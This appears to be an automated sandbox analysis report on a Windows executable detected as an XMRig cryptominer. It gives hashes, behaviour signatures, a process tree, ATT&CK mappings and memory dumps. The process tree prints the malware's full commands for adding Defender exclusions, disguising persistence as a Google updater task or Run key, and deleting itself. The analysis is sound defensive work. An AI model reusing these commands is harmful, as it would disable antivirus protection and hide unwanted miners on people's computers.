Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    445s
  • max time network
    1784s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 31 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1240
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\LM3BR4UBmKBzBP5H.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\LM3BR4UBmKBzBP5H.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1704
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1028
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2864
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:2636
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\LM3BR4UBmKBzBP5H.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2876
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2768
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1748
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1916
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:1444
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1976
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        2⤵
        • Drops file in Program Files directory
        PID:2836
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        2⤵
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:2272
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe qtdiqnkejoz
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious behavior: EnumeratesProcesses
        PID:1416
    • C:\Windows\System32\choice.exe
      choice /C Y /N /D Y /T 3
      1⤵
        PID:2616
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
        1⤵
          PID:2124
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {DA245697-ACAE-4277-AB6E-6A45D848201E} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2396
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2920
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic PATH Win32_VideoController GET Name, VideoProcessor
          1⤵
          • Detects videocard installed
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:1104

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Execution

        Scheduled Task/Job

        1
        T1053

        Persistence

        Scheduled Task/Job

        1
        T1053

        Privilege Escalation

        Scheduled Task/Job

        1
        T1053

        Discovery

        System Information Discovery

        1
        T1082

        Query Registry

        1
        T1012

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          556KB

          MD5

          70d73184c5c4c6a1b265288121c7b9bf

          SHA1

          dd0c538c6c5cd23ea5ea59afe76bf9fae3275859

          SHA256

          003cd3d8bbcc9f44eaff50d71f0a92775a387603bc5341c3d3ee72d37c11625c

          SHA512

          f27d152fcd2f75ef66b06e874b5ea059c7445b3321bb942bdae5d6f5e63d7664dd87dd1866a71a6eed1e10dec654d0555946fada2ec8ca7a5f59b95c1079678c

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          508KB

          MD5

          16dd11f6c87497578dd1d250ff2bbf69

          SHA1

          cf22de46b1f72be783d3e2be9219a10a4e605bd9

          SHA256

          f7be22390ad76001c50a8b1efb074ef849a5cac2712768552173967d81dd1a8e

          SHA512

          0513286ec6659a5a3b98a2425ba193c384afe33844bacf994983050960a086468d094736af3858d047470d6858ab924a851413456f2cd402b359e7bc81278f2e

        • C:\Program Files\Google\Libs\g.log
          Filesize

          198B

          MD5

          37dd19b2be4fa7635ad6a2f3238c4af1

          SHA1

          e5b2c034636b434faee84e82e3bce3a3d3561943

          SHA256

          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

          SHA512

          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FHQ827EU34J751Q7SJ13.temp
          Filesize

          7KB

          MD5

          4e4c4a20d9a990ee60a5ee32e6075f83

          SHA1

          3a5e2199d48f50439f2871aca15efb0aedc9c7f7

          SHA256

          2a3127471ef35b3dd5aa72d445a14c321760267f7154bbddb67197d2950e7ce8

          SHA512

          3e9d24ad47e7d39169bd3b4606302a13141deb75e25921f15d109308b2f9da5dc29ba30defbe9c9e6dc736724858f091c32db0a7a67e452dffb3f57b666aed33

        • \Program Files\Google\Chrome\updater.exe
          Filesize

          854KB

          MD5

          d6a21b2debf71c32167868d2694e5d9a

          SHA1

          2762873534747dd0b65ee3be92b3fe0c3b485589

          SHA256

          2ab5e9af53fa156fbaf7b672de12c8927d6590e25e2571e8b9bf1f0c3d5009dc

          SHA512

          d192e0d9d16c5c9699d4e3e68305bb2ea9fbd987036c6fd2401ef9838b0be9841b3c7d49c2f4224a4ec1f154f084d20e37519c58422c7f7772af2e280050e92c

        • memory/1028-9-0x0000000001F40000-0x0000000001FC0000-memory.dmp
          Filesize

          512KB

        • memory/1028-10-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
          Filesize

          9.6MB

        • memory/1028-11-0x0000000001F40000-0x0000000001FC0000-memory.dmp
          Filesize

          512KB

        • memory/1028-12-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
          Filesize

          9.6MB

        • memory/1028-7-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
          Filesize

          9.6MB

        • memory/1028-8-0x0000000001F40000-0x0000000001FC0000-memory.dmp
          Filesize

          512KB

        • memory/1028-6-0x0000000001F10000-0x0000000001F18000-memory.dmp
          Filesize

          32KB

        • memory/1028-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp
          Filesize

          2.9MB

        • memory/1416-68-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/1416-75-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/1704-27-0x000000013F120000-0x000000013F331000-memory.dmp
          Filesize

          2.1MB

        • memory/1704-0-0x000000013F120000-0x000000013F331000-memory.dmp
          Filesize

          2.1MB

        • memory/1748-47-0x0000000001564000-0x0000000001567000-memory.dmp
          Filesize

          12KB

        • memory/1748-43-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
          Filesize

          9.6MB

        • memory/1748-45-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
          Filesize

          9.6MB

        • memory/1748-49-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
          Filesize

          9.6MB

        • memory/1748-44-0x0000000001560000-0x00000000015E0000-memory.dmp
          Filesize

          512KB

        • memory/1748-46-0x0000000001560000-0x00000000015E0000-memory.dmp
          Filesize

          512KB

        • memory/1748-48-0x000000000156B000-0x00000000015D2000-memory.dmp
          Filesize

          412KB

        • memory/1916-52-0x0000000000A50000-0x0000000000AD0000-memory.dmp
          Filesize

          512KB

        • memory/1916-51-0x0000000000A50000-0x0000000000AD0000-memory.dmp
          Filesize

          512KB

        • memory/1916-53-0x0000000000A50000-0x0000000000AD0000-memory.dmp
          Filesize

          512KB

        • memory/1916-55-0x0000000000A50000-0x0000000000AD0000-memory.dmp
          Filesize

          512KB

        • memory/1916-56-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
          Filesize

          9.6MB

        • memory/1916-54-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
          Filesize

          9.6MB

        • memory/1916-50-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
          Filesize

          9.6MB

        • memory/1976-84-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-100-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-128-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-126-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-124-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-122-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-120-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-118-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-116-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-114-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-64-0x00000000000B0000-0x00000000000D0000-memory.dmp
          Filesize

          128KB

        • memory/1976-65-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-112-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-110-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-108-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-106-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-66-0x0000000000FB0000-0x0000000000FD0000-memory.dmp
          Filesize

          128KB

        • memory/1976-67-0x0000000000110000-0x0000000000130000-memory.dmp
          Filesize

          128KB

        • memory/1976-104-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-69-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-71-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-72-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-73-0x0000000000FB0000-0x0000000000FD0000-memory.dmp
          Filesize

          128KB

        • memory/1976-74-0x0000000000110000-0x0000000000130000-memory.dmp
          Filesize

          128KB

        • memory/1976-102-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-76-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-78-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-80-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-82-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-98-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-86-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-88-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-90-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-92-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-94-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1976-96-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2768-34-0x00000000028F0000-0x0000000002970000-memory.dmp
          Filesize

          512KB

        • memory/2768-38-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
          Filesize

          9.6MB

        • memory/2768-36-0x00000000028F0000-0x0000000002970000-memory.dmp
          Filesize

          512KB

        • memory/2768-37-0x00000000028F0000-0x0000000002970000-memory.dmp
          Filesize

          512KB

        • memory/2768-33-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
          Filesize

          9.6MB

        • memory/2768-35-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
          Filesize

          9.6MB

        • memory/2864-21-0x0000000002860000-0x00000000028E0000-memory.dmp
          Filesize

          512KB

        • memory/2864-23-0x0000000002860000-0x00000000028E0000-memory.dmp
          Filesize

          512KB

        • memory/2864-25-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
          Filesize

          9.6MB

        • memory/2864-24-0x000000000286B000-0x00000000028D2000-memory.dmp
          Filesize

          412KB

        • memory/2864-22-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
          Filesize

          9.6MB

        • memory/2864-18-0x000000001B4B0000-0x000000001B792000-memory.dmp
          Filesize

          2.9MB

        • memory/2864-20-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
          Filesize

          9.6MB

        • memory/2864-19-0x0000000001DC0000-0x0000000001DC8000-memory.dmp
          Filesize

          32KB

        • memory/2920-63-0x000000013FF40000-0x0000000140151000-memory.dmp
          Filesize

          2.1MB

        • memory/2920-42-0x000000013FF40000-0x0000000140151000-memory.dmp
          Filesize

          2.1MB